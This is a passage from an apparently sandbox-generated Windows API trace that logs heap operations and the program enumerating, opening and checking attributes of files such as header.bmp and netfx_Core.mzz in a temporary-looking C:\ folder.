Size=0x20) returned 0x88388 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.167] AreFileApisANSI () returned 1 [0062.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0062.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0062.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x6cd40, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 40 [0062.167] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796)) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0062.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0062.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.168] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x4e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x66f48, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x4e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="o", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓➖")) returned 0 [0062.168] FindClose (in: hFindFile=0x780d0 | out: hFindFile=0x780d0) returned 1 [0062.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0062.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0062.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0062.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0062.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0062.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.169] AreFileApisANSI () returned 1 [0062.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\header.bmp", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\header.bmp", lpUsedDefaultChar=0x0) returned 33 [0062.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0062.169] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.169] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0062.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0062.169] AreFileApisANSI () returned 1 [0062.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0062.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x69300 [0062.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\header.bmp") returned 33 [0062.169] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0062.170] GetFileType (hFile=0x410) returned 0x1 [0062.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0062.170] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.170] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.170] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.170] CloseHandle (hObject=0x410) returned 1 [0062.170] AreFileApisANSI () returned 1 [0062.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0062.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x690d0 [0062.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\header.bmp") returned 33 [0062.171] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0062.171] GetFileType (hFile=0x410) returned 0x1 [0062.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0062.171] CloseHandle (hObject=0x410) returned 1 [0062.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0062.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0062.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0062.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0062.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0062.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0062.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0062.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0062.172] AreFileApisANSI () returned 1 [0062.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68b30 [0062.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x68b30, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\header.bmp") returned 33 [0062.172] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c)) returned 1 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0062.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.172] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x66ea7e00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0xad1384b, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="netfx_Core.mzz", cAlternateFileName="NETFX_~1.MZZ")) returned 1 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0062.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0062.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0062.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0062.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0062.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.173] AreFileApisANSI () returned 1 [0062.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core.mzz", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\netfx_Core.mzz", lpUsedDefaultChar=0x0) returned 37 [0062.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0062.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0062.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0062.173] AreFileApisANSI () returned 1 [0062.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0062.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d688 [0062.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=37 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 37 [0062.173] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0062.173] GetFileType (hFile=0x410) returned 0x1 [0062.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0062.174] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.174] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.174] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.174] CloseHandle (hObject=0x410) returned 1 [0062.174] AreFileApisANSI () returned 1 [0062.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0062.174] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6ce48 [0062.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x6ce48, cchWideChar=37 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 37 [0062.174] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0062.174] GetFileType (hFile=0x410) returned 0x1 [0062.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0062.175] CloseHandle (hObject=0x410) returned 1 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 